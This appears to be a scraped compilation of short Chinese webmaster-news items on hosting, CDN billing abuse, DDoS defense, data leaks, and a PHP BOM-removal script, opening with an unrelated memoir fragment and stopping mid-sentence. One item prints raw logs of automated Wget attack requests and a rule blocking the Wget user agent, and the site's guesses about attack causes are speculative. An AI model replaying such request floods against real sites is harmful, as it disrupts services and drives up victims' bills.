今天趁这个机会,提一口真气,把它写出来。 没有给倪老师看。因为倪老师是个真正的君子。如果给他看了,他一定会为这个人避讳,为那个人考虑。 从昨天晚上,突然想写,今天早上6:00再也睡不着,爬起来,一口气写了一万字。也许该写的不该写的,我全写了。这是我的个人视角,个人叙事。 某年,我和郝玺龙一家还有他的朋友几人,一起去长白山玩。 夜宿山脚下的农家院。居然在这个农家院里,遇到了刘强。 方舟一别,没想到多年之后,居然在千里之外,这样的地方再见。 昔日的英挺少年,鬓已斑斑也。那时他已经创办君正。方舟往事,大家都不愿意再提起了。 那么多好战友,我们散了,都没有道别过。 但是,曾经的尝试、努力、错误、牺牲。发生过就是发生过。 把此文放到互联网上,以此向当年曾并肩作战过,彼此支持,彼此抱怨,没能好好道别的战友、老师说一句:谢谢、珍重。 来源:梁宁-闲花照水录 #### 一求职招聘 App 短信验证码接口遭 1300 多万次黑客攻击,致 300 万条数据泄露 12月10日,根据央视新闻的官方推特,一个求职招聘类应用程序的短信验证码接口遭受了超过1300万次的攻击。警方调查显示,两名嫌疑人利用网站漏洞创建黑客软件并进行“撞库”攻击,从而获取大量个人信息和公司账号数据,并在境外出售。 此外,从央广网的相关报道中了解到,北京警方近期接到一家互联网公司的报案,称其求职招聘类应用的短信验证码接口遭受到1300余万次攻击,成功匹配注册账号达到30多万个。北京警方迅速判断这是一起黑客利用网站漏洞非法获取账号信息并用于违法活动的案件。 据犯罪嫌疑人喻某供述,他在2022年10月18日在该招聘平台注册账户,并多次尝试验证接口。他发现该网站的签名算法相对简单,于是利用这个弱点编写指令,制作黑客软件对该网站进行“撞库”攻击。 如果用户在不同的平台上使用相同的用户名和密码,就相当于给了黑客一把“万能钥匙”。只要登录成功,黑客就可以随意获取个人信息。 同时,他还利用类似的方式对其他各大网站进行渗透,并寻找网站漏洞作为诱饵向他人兜售自己编写的恶意程序、黑客工具,从中牟利。经过民警的不懈努力,专案组在四川成都成功抓获另一名嫌疑人焦某,现场查获各类公司和个人数据330余万条。 犯罪嫌疑人喻某、焦某因破坏计算机信息系统罪被依法刑事拘留,案件正在进一步审理中。 北京市公安局网安总队侦查员为用户设置密码提供了以下建议: 密码应避免过于简单易猜; 在公共设备上登录个人账号时,不要勾选“记住密码”、“默认登录”等选项,尽可能选择匿名登录; 使用需要填写重要账号密码的第三方应用程序或不知名应用时,要保持谨慎态度,尽量减少透露个人详细信息。 #### 一牛人博主独立博客卖了65万 近日,从其他站长交流群探知,SEO圈内某大佬手里的7年个人博客站被人以65万收购 ,在当今网站行情这下属实牛批! 要知道自从移动时代后,网站建设已经没有以前这么火热了,抖音火了后,很多人已经很少看网页了,博客界甚至一度认为博客已死。 如果放在以前一个博客65万的价格确实不算高,上百万几百万收购一个网站的比比皆是,主机吧曾经也卖过一个问答网站,当时成交价也是5万多,这只是主机吧3年多做的垃圾站而以,曾经就有一帮SEO人专门做流量站,把网站权重做上去了,然后转手卖了赚钱,一些行业站几十万不懂,即使垃圾站也卖出几万的价格,交易都是用A5(www.a5.net)交易,那时可火了。 不过随着网站势微,这帮人也转行做其它新媒体去了,此次这位大牛卖了65万还是可以说明网站建设这个行业虽然没有以前这么火热,但是还是有钱可赚的。 #### 一种针对服务器的云盘空间的新型网页攻击 就在昨天,主机邦的一个网站无缘无故502了,主机邦登陆宝塔后台发现服务器云盘空间居然满了,要知道买的云服务器有50G的空间容量哈,即使装了系统和Web环境,也不过才10G,还有40G去哪了?! 一开始主机帮以为是网站空间的缓存导致的,结果查询www目录,发现只要几百M,也就是整个网站程序只有几百M,那就不是网站生成的缓存了,然后我们通过查询网站请求日志,发现网站正被自动化软件请求。 150.138.245.235 - - [10/Dec/2024:01:34:40 +0800] "GET /users/bACBBxumn/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22javascript:void(0)%5C%22 HTTP/1.1" 301 5 "https://www.yunjiasu.cc/users/bACBBxumn/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/credit%5C" "Wget/1.21.1" 150.138.245.235 - - [10/Dec/2024:01:34:40 +0800] "GET /users/bACBBxumn/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22javascript:void(0)%5C HTTP/1.1" 200 131338 "https://www.yunjiasu.cc/users/bACBBxumn/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/%5C%22https:%5C/%5C/www.yunjiasu.cc%5C/gold%5C/credit%5C" "Wget/1.21.1" 这些请求链接不仅长,而且编码乱七八糟的,本来是对网站空间产生不了什么影响的,但不知道什么原因Debian系统会产生大量的缓存文件,直接导致云服务器的资料占用空间一直在涨,短短半小时就涨了1G的占用空间,吓得主机邦赶紧换系统,换成比较成熟的CentOS,并用百度云防护拦截UA含Wget的请求,这才恢复正常。 主机邦猜测这可能是一种利用程序漏洞攻击操作系统,让操作系统产生大量的临时文件,从而占满服务器空间,这种攻击的目的就是让你的网站无法正常访问,也不知道主机邦的网站做了什么伤天害理的事情。自从使用百度云防护拦截后,就没有再收类似的攻击请求了。 #### 一站长收到图片版权侵权起诉 要求赔偿1万元 网站配图的站长小心啦,不要随便用网上搜的图片配文了,很容易吃官司。最近又有站长收到了互联网法院的民事起诉状,原告为:北京美好景象图片有限公司,只因站长使用了对方一张图片,就被要求赔偿1万元。 主机吧查了下,这家公司相关自身风险2.5万多条,民事诉讼非常多,这家公司什么成份大家懂了吧? 所以大家在给网站配图的时候要小心啦,可以去国外的免费图片网站找,别在百度上找。 #### 一觉醒来,又拍云CDN被刷了欠费2700 主机帮早之前有报道过,国内网站正遭遇大量刷CDN流量事件,很多站长因被刷受到了财产损失。这不,今天又有一位受害者,一觉醒来,CDN被刷了欠费2700。 账单编号 计费时间 费用合计 优惠金额 实付金额 收费项 计费模式 计费值 费用 每日明细 202408031822334340 2024-08-03 00:00 至 2024-08-04 00:00 2806.93 元 56.96 元 ( 代金券抵扣 56.96 元 ) 2749.97 元 基础云服务<br>CDN 服务 - 国内 日使用流量 9540.164 GB 2766.650 元 - 明眸服务(CDN) 日使用流量 0.000 GB 0.000 元 - HTTPS 加速 - 国内 日请求次数 8055335 次 40.280 元 - 动态资源加速 - 国内 日请求次数 0 次 0.000 元 - 标准存储 - 存储容量 日使用存储 12.384 GB 0.000 元 可用流量抵扣 12.384 GB 这并不是第一个被刷的站长,也不是最后一个,很多人说是PCDN用户为躲避监管刷的,主机帮不认为是这个原因,因为PCDN不可能如果为了躲避监管,没必要刷这么明显。 主机帮认为可能是国内黑客圈出了个专门针对上了CDN的网站的攻击方式,因为传统DDOS CDN的话不仅效果不好,而且成本贵,而通过刷CDN流量是最好的CDN攻击方式。 主机帮建议使用套餐型的CDN,如百度云防护,流量按月计算,超量了自动回源,不会有欠费问题,同时还支持WAF,可防御DDOS、CC攻击,可针对高频访问做频率限制,可自定义访问策略,有效针对刷流量的问题。 #### 一觉醒来,欠了百度智能云一个亿! 今早有发某位站长因百度智能云系统BUG,导致欠了9万多,目前来看是少了,经主机帮查询后发现,最高的欠了一个亿! 这天文数据我只在清明节烧纸钱的时候见过…… 同时还在大量用户也是欠了几百万几千万不等的。 从欠费单上来看,基本都云存储的外网流出流量导致的欠费。 不过欠费是bug所致,并不会对业务正常使用造成影响。 针对此事,百度智能云也发布了公告: 只能说虚惊一场!对于云服务运维来说,这绝对是惊吓,要是某天因为自己处理不及时,导致云服务欠费1个亿,那真的是卖了都不够赔。 业务后付费其实各大云服务商都有,像CDN、云存储、云服务器带宽流量等,都是有后付费机制,这种付费方式好处是,业务用多少付多少,但缺点也很明显,一但被刷或者被恶意攻击,就会产生大量的费用。 关键是这些费用服务商一般是不会给你减免的,所以风险非常高,像本次欠几百万的情况估计不会有,但一晚上欠几万的十几万的情况,是真的有,主机帮之前有客户就遇到过,主机帮的一客户使用京东云的SCDN,带宽超过200M后,就会产生后付费,结果两天就欠了七八万,还有几年前一位站长使用了阿里云的CDN,直接被攻击产生大量的流量费用,一晚上也欠了十几万,最后还不上连号都不要了。 这些连号都不要的是业务没有存在云服务商的,而那些云服务器、云存储存在服务商的,如果因为帐号欠费没还最重导致业务停止服务的就惨了,需要先把欠的钱还上才可以正常取回数据,否则将无法取回数据,主机帮的一位客户前上个月中招过,欠费9800,服务器业务直接被停止了,而且无法取回。最后把钱还了数据才能取出。 说这么多,要怎么预防呢?目前来看各大云服务商都有余额预警。 当帐户剩多少钱的时候,或者消费多少钱的时候会发送短信提醒,但都没有欠费立即停止的机制。 而阿里云的欠费停止并不是实时更新的,所以如果短期内产生大量的消费,你依然会欠很多费用。 #### 一键去除网页BOM属性【解决网页乱码,头部空白,验证码不显示问题】 几个常出现的问题: 1.网站打开空白 2.页面头部出现多余的空白 3.网站出现乱码,如“锘�” 4.后台登录验证码不显示 解决方案: 1.选用专业的编辑器,例如notepad++,sublime,editplus这样不会自动签名。 2.sublime通过如下操作File -> Save with Encoding -> UTF-8保存后即可去除bom 3.notepad++选中格式 -> 以UTF-8格式编码 选项即可去除 4.用如下方法可一次性清理网页所有文本文件的bom 复制下面代码 <?php $dir=dirname(__FILE__); if(isset($_GET["act"]) && $_GET["act"] == "del" ){   //Del the file!! $filename=basename($_SERVER['PHP_SELF']); @unlink($filename); exit('Error:File Not Found!'); } echo "The document:".$dir."&nbsp;&nbsp;<a href=\"?act=del\" >[Del the delbom.php file]</a><BR/>"; if (!is_dir($dir)) die("$dir not exists"); $auto = 1; checkdir($dir); function checkdir($basedir){ if ($dh = opendir($basedir)) { while (($file = readdir($dh)) !== false) { if ($file != '.' && $file != '..'){ if (!is_dir($basedir."/".$file)) { echo "filename: $basedir/$file ".checkBOM("$basedir/$file")."<BR/>\n"; }else{ $dirname = $basedir."/".$file; checkdir($dirname); } } } closedir($dh); } } function checkBOM ($filename) { global $auto; $contents = file_get_contents($filename); $charset[1] = substr($contents, 0, 1); $charset[2] = substr($contents, 1, 1); $charset[3] = substr($contents, 2, 1); if (ord($charset[1]) == 239 && ord($charset[2]) == 187 && ord($charset[3]) == 191) { if ($auto == 1) { $rest = substr($contents, 3); rewrite ($filename, $rest); return ("<font color=red> BOM found, automatically removed.</font>\n"); } else { return ("<font color=red>BOM found.</font>\n"); } } else return ("BOM Not Found.\n"); } function rewrite ($filename, $data) { $filenum = fopen($filename, "w"); flock($filenum, LOCK_EX); fwrite($filenum, $data); fclose($filenum); } ?> 复制上面的代码   使用方法:复制上面代码到一个新建的delbom.php(用记事本或者是文本编辑器打开此文件)的文件中,上传到网站根目录,然后访问您的站点,比如http://www.**.com/delbom.php 即可清理所有网页中存在的bom便签。   #### 一键自动检修Intel CPU漏洞 360安全卫士首发修复工具 由国外安全机构披露的“Meltdown”(融化)和“Spectre”(幽灵)两组CPU漏洞,引爆了一场安全危机。该漏洞影响全球所有桌面电脑、笔记本和服务器,攻击可以让PC端本应受到保护的信息被外部拦截获取,网民的隐私信息存在被暴露的风险。 对此,360安全卫士于1月5日紧急推出“CPU漏洞免疫工具”,从漏洞修复及安全防护两方面入手,阻断漏洞入侵通道。该工具可一键检测电脑是否存在漏洞,全方位排查补丁兼容性,并为受到漏洞影响的系统及浏览器推送安全更新,有效免疫CPU漏洞。针对没有补丁的系统,开启360安全卫士能够全面防御攻击,把漏洞风险降到最低。 CPU漏洞免疫工具下载地址:(请戳链接) 这两组漏洞的利用依靠现代CPU普遍使用的推测执行特性(speculative execution),通过用户层面应用从CPU 内存中读取核心数据。CPU如人类大脑,你的所思所想可能随时泄露。在实际攻击场景中,攻击者在一定条件下可以泄露出本地操作系统中的底层运作信息,根据这些信息绕过内核的隔离防护,还可以通过浏览器远程攻击获取用户的相关隐私信息。 尽管此系列漏洞影响广泛,但是实际上所造成的危害却并不特别严重,360 助理总裁、首席安全工程师郑文彬介绍,网民只要保证良好的上网习惯,及时为系统及浏览器更新补丁,就能有效防御利用这些漏洞进行的攻击。 打补丁是防御CPU漏洞攻击的最重要一步,360安全卫士“CPU漏洞免疫工具”可一键检测系统受漏洞影响情况,全方位排查补丁兼容性,并为用户极速下载安装补丁。 由于CPU漏洞的最大威胁是针对浏览器的恶意网页攻击,免疫工具会对浏览器进行检测,提示用户升级到已有补丁的最新版本,从而阻断恶意网页攻击CPU漏洞的入侵通道,为此漏洞唯一的远程攻击入口建立牢固的安全防线。 CPU漏洞彻底修复的复杂度较高,修复这些漏洞需要操作系统厂商、虚拟化厂商、软硬件分销商、浏览器厂商、CPU厂商一起协作并进行深入修改,才能彻底解决问题。目前,微软发布的32位(X86)系统补丁就无法完全防止攻击,需配合还未发布的Intel微码补丁才有可能阻止所有攻击。 此外,鉴于紧急下发的补丁可能与电脑上部分软件不兼容,出现蓝屏、系统无法正常使用的情况,360安全卫士提醒用户请谨慎处理,可待补丁稳定后再打补丁。在此过程中,360“CPU漏洞免疫工具”将为用户有效缓解攻击,同时持续关注漏洞修复进程,实时为用户推送更完美的解决方案。 附:CPU漏洞具体影响范围 #### 一黑客组织试图劫持90万个WordPress网站 5月6日 消息:根据网络安全公司Wordfence发布的安全警报,在过去的七天里,一个黑客组织试图劫持近一百万个WordPress网站。 该安全公司表示,自 4 月 28 日以来,这个特殊的黑客团体参与了一场大规模的黑客活动,导致Wordfence追踪的攻击流量增加了 30 倍。 Wordfence安全研究人员Ram Gall表示,该黑客组织从超过 24000 个不同的IP地址发起攻击,试图入侵超过 90 万个WordPress站点。这些攻击在 5 月 3 日达到顶峰,当时该组织对 50 万个域名发起了 2000 多万次攻击企图。 该组织主要利用跨站脚本(XSS)漏洞在网站上植入恶意JavaScript代码,将传入流量重定向到恶意网站。恶意代码还扫描访客登录管理员,然后试图通过自动创建后门帐户。 Wordfence建议,WordPress网站所有者更新他们网站上安装的主题和插件,以避免成为攻击目标。(zdnet) #### 七牛云对象存储如何使用别家CDN 应用场景: 我的网站用的是七牛云对象存储,想用别的CDN加速对象存储内容怎么弄? 方法很简单: 1.进入对象存储-空间管理-点击进入需要CDN加速的空间 2.点击域名管理-自定义源站域名 3.添加要加速的域名,比如img.zhujib.com 4.点击绑定域名后,七牛云会提供一个cname解析记录给你,如下图: 5.复制该cname地址,到CDN添加之前在七牛添加的子域名(记住一定要跟之前添加的一样子域名) 6.把之前在七牛复制的cname地址填到CDN回源地址上,保存。 7.添加CDN域名后,CDN会提供一个cname的记录,比如百度云防护的下图: 8.我们复制CDN提供的这个cname地址到域名那里解析就可以了。 简单的流程就是:七牛云绑定域名——CDN绑定并回源七牛云的cname——域名解析CDN提供的cname #### 七色光攻击很好防吗? 1. CDN防御问题 想靠高防CDN来防御七色光的攻击 很难,因为他们量多,可以同时对CDN的节点进行同时攻击,造成CDN大面积故障,一般CDN服务商都是共享的节点,大家都用这个一组网络,因为接你一个导致大家都无法使用,一般CDN服务商是会清退的。 有人会说我CDN牛逼 2T集群,无敌,那是笑话,打挂你需要把你所有IP打费吗? 不需要,打你几个节点就好了,我不信你每个节点都是2T。顶多几百G防御,甚至有些就几十G的防御。 还有个问题,七色光的CC攻击特别大,十几万QPS每秒不是问题,这对于CDN压力是巨大的。当然CDN是可以秒切节点,节点故障了可以切换,但是节点秒切,你用户DNS可没秒切,一般会出现5分钟左右的无法访问,对于要求高的网站来说,还是有损失的。除非有像Cloudflare 那样使用任播(Anycast)技术,不过这个目前国内我知道的服务商中,就阿里云的SCDN采用这项技术,不过防御成本那也是突破天际。 2.七色光可以攻击能有多大 主机吧这边也做防御的,所以有接触到他们攻击,他们攻击一开始是试探性的攻击几十G,看看你的防御具体多大,如果看你挂了,就每天打你这么多G,直到你服为止。如果你防御住了,他们会慢慢递增,主机吧这边目前接触到的最高打到400G左右 纯SYN攻击。不是UDP,UDP估计更高。我甚至感觉七色光能打到500G以上。 3.CC攻击防御 七色光的CC攻击是非常大的,有多大呢?在百度云加速那里测试,每秒攻击达100W+,当然也可能没这么大,毕竟百度云加速的CC防御计量是有点虚的,但可以肯定绝对几十万每秒。当然CC攻击其实还是很好解决的,防御系统牛逼的话,是可以压制住的。 4.如何防御 我认为最好是买高防服务器,目前很多机房都提供几百G的独享防御,价格在几千块一个月这样,虽然不一定能彻底防御住他们的DDOS攻击,但是独享防御有个好处,就是可以秒解,大流量攻击一般持续不长,也就几秒的,最多一分钟的事,机房封了一般10分钟左右就恢复了。网站一样棒棒哒! 至于CC有些高防服务器是带金盾的,看着日志,封禁就好了,当然可能有些麻烦,毕竟CC这玩意他是可以换着来的。 有钱的买独享高防IP,没有500+峰值的高防IP不一定能防得住,但起码挂的时候不长,高防IP也是可以秒解,而且厉害的高防IP系统防御CC是非常好的。适当增加黑客攻击成本,久了他们就放弃了,当然我感觉七色光除外,他们跟疯狗似的,一打就打几个月   还有如果用不到UDP建议买上层封禁UDP的机房,这玩意攻击会非常大。买高防IP还有个好处,就是一般都有专门技术给你拦截CC,伺候你,爽得一批。 能接受出现短暂无法访问的,可以用独享的高防IP 高防服务器,CDN也要独享,共享的别想了。有钱大佬可以买几个高防服务器自建CDN,秒切节点来防,当然这也是没有办法中的办法,想要彻底防住,500G左右防御不能少。 5. 防御价格几何 综合上述原因,想要彻底无感防御住七色光的攻击,价格不会低,起码单500G防御,一个月的租用价格就不会低,一个月应该在1W左右。 如果能接受短暂无法访问的话,买200G左右最合适,200G左右价格应该是5000+左右,买高防服务器价格会便宜些,不过CC这块是个难题。有需要的可以联系主机吧,专业防御,效果好! #### 万人举报阿里巴巴小二,私下利用阿里资源开发返利网APP 网爆官方联盟小二私下利用阿里资源创办返利网APP,让一大堆淘客举报,还在继续闹大中~ 据微博网友华梨子爆料,称目前各群里淘客在爆打联盟电话和旺旺群举报,还有官方小二廉政链接举报此事。并要求阿里联盟官方给出一个合理的解释。不然要去阿里总部组团举报小二,必须要总部出面严查一下联盟小二, 跟花生日记红人装返利APP的关系,目前举报群过万人。 据举报内容得知,原来是在联盟官方群中,禁止群成员讨论红人装app和花生日记app的违规运营,并且只要有人讨论或者举报就踢谁。 内幕消息称小二还充当着花生日记合伙人的身份,利用自己拥有的便利条件“阿里资源”,做出与我们已经打造好的市场违规的运营,严重影响到淘客的切身利益。 纸包不住火,利用自己的资源却做出违规他人利益事情来,这下势必会引起民众群哄反击的,既然事出有因,预测这下一举报,小二的身份可能很快会水落石出... #### 万维网之父新使命:把互联网数据控制权归还给网民 10 月 11 日消息,据科技博客TechCrunch报道,“万维网之父”蒂姆·伯纳斯-李(Tim Berners-Lee)怀着将Web去中心化的使命。在获得风投们的支持以后,他想要将权力和个人数据控制权归还给网民。 “我一直认为网络是为每个人服务的。”伯纳斯-李写道。 “网络已经演变成一个充满不公平和分裂的工具;它被利用来谋取私利。”他补充道,“如今,我认为,我们已经达到了一个关键的临界点,向更好的方向进行强有力的改变是可能的——也是必要的。” 上月末,他在一篇宣布创业公司inrupt的博客文章中发表了上述言论。这家公司会执行他对于其近 30 年前缔造的信息高速公路的愿景。该初创企业得到了Glasswing Ventures的一笔未披露数额的资金支持,如今它正走进公众视野,计划将互联网去中心化,将权力归还给网民,而不是那些利用用户信任获取财务收益的公司。 伯纳斯-李这么做的时机可以说再好不过了。从数据分析公司Cambridge Analytica利用Facebook的数据在总统竞选中期间锁定美国总统唐纳德·特朗普(Donald Trump)的选民,到最近谷歌旗下社交网络Google+出现数据泄露,导致数十万毫无戒心的用户的私人信息流出,过去一年数据隐私丑闻频传。 至少可以说,互联网隐私和安全是热点问题。用户正迅速失去对那些在数字时代成为某种公共事业单位的公司的信任——他们正要求获得解决方案。 恢复对数据和整个Web的控制的竞赛已经开始;inrupt正在瞄准终点线。 万维网之父 伯纳斯-李是一名英国工程师和计算机科学教授,被誉为“万维网之父”,让每个有电脑的人都能够免费访问互联网。 在过去几年里,他一直在麻省理工学院与一个小团队默默从事一个名为Solid的项目。Solid是一个基于现有Web的开源项目,旨在让人们能够控制自己的数据。通过使用Solid,用户就可以将他们的数据保存在他们选择的任何地方,而不是被迫将其存储在中央服务器上。 尽管Solid抱有民粹主义雄心,但它还是未能形成真正颠覆互联网所需的发展势头。 伯纳斯-李认识到,Solid需要获得商业支持,需要建立一个真正的商业基础,以便引起开源开发者的兴趣。有他们在Solid的平台上建立去中心化的应用,该平台才会变得有用。 于是,inrupt应运而生。伯纳斯-李任命约翰·布鲁斯(John Bruce)担任公司的首席执行官。布鲁斯曾联合创立Resilient公司,该公司后来被IBM收归门下。在此之前,他曾先后担任过Quickcomm公司的董事长兼首席执行官以及赛门铁克公司的副总裁。 今年 4 月,布鲁斯辞去了IBM的职务,以全身心经营inrupt。 “我们在网络上创造的世界并不好。”布鲁斯告诉TechCrunch,“也许,只是也许,我们可以把它置于它本来应该被置于的地方。” “目前,Inrupt的使命是带来资源、流程和技能来激发伯纳斯-李从麻省理工学院带出来的开源项目,帮助Solid真正成为一股不可忽视的力量。”他补充道,“我们正在打造新的网络,就像蒂姆当初创建万维网时一样。” 布鲁斯表示,自从伯纳斯-李在九月底宣布inrupt以来,开源开发者已经成群结队地涌入Solid平台。 现在,两人正准备筹集另一轮资金,招兵买马,扩张Solid平台,并开发一项名为Charlie的数字助理工具。该公司将该工具描述为“Alexa的去中心化版本”。 对于伯纳斯-李来说,inrupt是一个大故事的第二幕。对于布鲁斯来说,这是一个与传奇人物合作共事的机会。 “这是一个比地球上任何人都更了解网络的人,”布鲁斯指出,“创新的车轮真的才刚刚开始转动。”(乐邦) #### 万维网基金会宣布关闭了 10 月 1 日消息,历经 15 年后,万维网基金会(World Wide Web Foundation,WF)联合创始人罗斯玛丽・利斯和万维网发明者蒂姆・伯纳斯-李(Tim Berners-Lee)宣告其使命已经完成,WF 即将关闭。 两人表示,该基金会成立于 2009 年,当时全球只有五分之一的人能够上网,而十五年后,全球近 70% 的人都已经能够上网,许多类似的非政府组织也在努力让网络变得更易于访问且更便宜。 两位创始人先是感谢了多年来所有支持他们的人,“使我们能够在易用和易负担方面取得重大进展”,他们坚持认为现代网络(Web 2.0)面临的问题已经发生变化,相信其他倡导组织可以接管 WF 的职责。 他们认为,现在最紧迫的问题之一是社交媒体商业模式,那些平台会将用户数据商品化并使平台权力过于集中,这与伯纳斯-李对网络的最初愿景背道而驰。为了应对这一问题,他宣布将解散 WF 以便专注于去中心化技术,例如 Solid 技术,希望将个人数据的控制权交还给个人。 我们的结论是,Tim 对恢复个人对数据的所有权和控制权以及积极构建强大的协作系统的热情应该成为未来工作的最高优先级。为了最好地实现这一点,Tim 将专注于支持他对 Solid 协议和其他去中心化系统的愿景。 万维网基金会(World Wide Web Foundation)由万维网的发明者蒂姆·伯纳斯-李爵士(Sir Tim Berners-Lee)和罗斯玛丽·莱思(Rosemary Leith)于2009年共同创立。该基金会是一个独立、国际性的组织,致力于推动开放的万维网作为公共利益和基本权利。 基金会的目标是让世界上每个人都能够负担得起、有意义地访问到能够改善他们生活的网络,并且保护他们的权利。他们通过原创研究、倡导和公共行动来塑造所需的政策和产品,以实现我们期望的网络。在过去的十年中,他们成功地扩大了互联网的接入、捍卫了网络中立性、保护了在线隐私、开放了公共数据,并支持了本地创新。他们帮助超过6亿低收入和中等收入国家的人们降低了互联网接入成本,并从世界上最大的科技公司那里获得了前所未有的承诺,以解决其平台上针对女性的虐待问题。 万维网基金会还与160多个合作伙伴组织合作,在70多个国家推进其使命,通过开放的网络连接每个人、提高声音和增强参与度,从而改变超过20亿人的生活。 #### 三五互联又活了 新股东向公司账户注入 1000 万元资金 2 月 14 日消息,三五互联今日发布“关于员工薪资发放及服务承诺的正式公告”。 公告称,此前,三五互联因从琏升科技(股票代码:300051)完成剥离,导致账面资金出现暂时性缺口。截至 2025 年 2 月 14 日,公司新股东基于对公司长远发展战略的充分认可,已向公司账户注入 1000 万元资金。该笔资金已全额到账,有效缓解公司此前因股权变更因素导致的资金紧张局面,公司所有员工工资均可在本日内发放完毕。 此外,三五互联还附上公司银行账户余额截图(截至 2025 年 2 月 14 日),及 2025 年 2 月 13 日发布的《关于公司股权变更及资金情况的说明函》。 今日早些时候网上流传着一个落款为“厦门三五互联信息有限公司”(下称“三五信息”)发布的《工资延期发放通知》。通知称公司面临经营困境,资金流转困难,受行业竞争加剧、建站市场衰落等影响,公司业务受挫,资金回笼缓慢。截至目前,公司银行账户余额为 133032.64 元,不足以支付原定于 2025 年 2 月 10 日发放的 2025 年 1 月份员工工资。月工资总额以往平均值为 120 万左右,另外供应商等各类费用也待支付。 #### 三人盗用宽带开展 PCDN 业务被判刑 前段时间有大量的CDN用户被刷流量导致欠费的,很多人欢迎是PCDN业务刷的,今天我们就来说一个因为盗刷流量被判刑的案例。 近日,湖南省长沙市雨花区人民法院审结了一起职务侵占案,法院以职务侵占罪分别判处三名被告人有期徒刑二年六个月至二年二个月,并处罚金 2 万元至 1.4 万元;没收各被告人作案工具;责令三名被告人继续退赔被害单位经济损失。2023 年 11 月 14 日,某通信集团公司工作人员在进行日常经营业务核查时发现,有一批宽带业务账号(5055 个)后台流量超大,高度疑似他人盗用宽带开展 PCDN 或者宽带出口经营。11 月 15 日,公司进一步核查宽带账号登录数据,经过技术分析,筛选出 57 个 PON 端口下有多个账号登网,涉及长沙市岳麓区多个小区 3542 条宽带,基本可以确定他人盗用宽带的事实。经公司内部纪律部门调查,11 月 18 日,刘某向公司交待了自己的基本犯罪事实,公司向公安机关报案。12 月 6 日,公安机关将刘某、向某、王某等涉案人员抓获。 刘某 2014 年自某名牌大学人工智能专业毕业后进入该公司长沙分公司工作,努力工作多年,成为了岳麓区建维中心的集客建设经理,负责公司光缆设备建设施工及开通业务,以及相关资源申请。 公司项目通过招投标方式承包给第三方,第三方施工、管理及人员考核均由刘某负责。 2021 年底,第三方合作单位中负责高新区宽带维护工作的向某带朋友王某找上门来商谈“搞钱”门路。  王某自学了网络服务器维护工作,发现了网络运营和维护的“商机”,即短视频、直播业务火爆,各方平台对于流量的需求巨大,盗取家庭宽带“沉睡”账户流量整合,引流到私建基站,贩卖流量到直播平台。 在金钱的诱惑下,三人利用手中的资源开始干起来。(1)刘某负责基站选址、电话遥控指挥;(2)向某利用职务便利,从后台获取闲置客户的流量使用情况,并将用户信息和后台数据发给负责技术的王某;(3)王某则负责窃取流量并对外出售获利。2022 年 8 月至案发,三名被告人通过上述方式共计非法获利 79.4 万元。在公司内部审查期间,被告人刘某主动交代相关事实并退赔损失款 48 万元,并于案发后再次退赔 20 万元。被告人向某向公安机关退赃 8000 元。法院审理后认为,鉴于三名被告人分别具有自首或者坦白以及退赃退赔、认罪认罚情节,在公诉机关提出的量刑建议基础之上,法院以职务侵占罪判处三人有期徒刑及罚金,并责令退还被害单位经济损失。 #### 三十岁后悔的二十件事 马上三十岁了,看到了狠多真诚的答案,在我有限的人生经验中,错过可以说直接上一个阶层的机会,至今后悔不已,往事并不如烟。一、相信命,我反而认为信命并不是极致的悲观、灰暗和迷信,而是理性又成熟深刻的价值观,知道山外有山,才能云淡风轻,这个世界本质的是不公平,每个人的起跑线是不一样,个体的差异不为人的意志所转移,最终的结果大不相同,是客观事实,明白这个现实我们才能更好的活自己。三十岁之后的使命是接受自己是一个普通人。二、趁早买房,越早越好,那些告诉你生活还有诗和远方,通通都是错的,害人不浅,成熟的观念是一定要先买房,越早越好,相信我们国家。在买房这件事上的错误判断让我需要多付出很多年的代价。只要经济在发展,城市化进程还在走,也许买房可能是这辈子最正确的决定。三、越早理财越好,有人说没有几十万就不要理财,去享受生活,去看看世界,去旅游,这些观点通通都是错的,年轻的时候一定要存钱,在没有结婚之前,把收入分成几个账户:消费账户,应急账户,储蓄账户。把50%以上的收入存起来,少折腾股票或其他投资,股市那点本金基本收益率和货币基金差不多,没必要折腾,老实存起来,你的账户数字越来越多,你的自信就会越来越多,你的思维就会越来越广。四、自我预期管理,降低自我预期的阀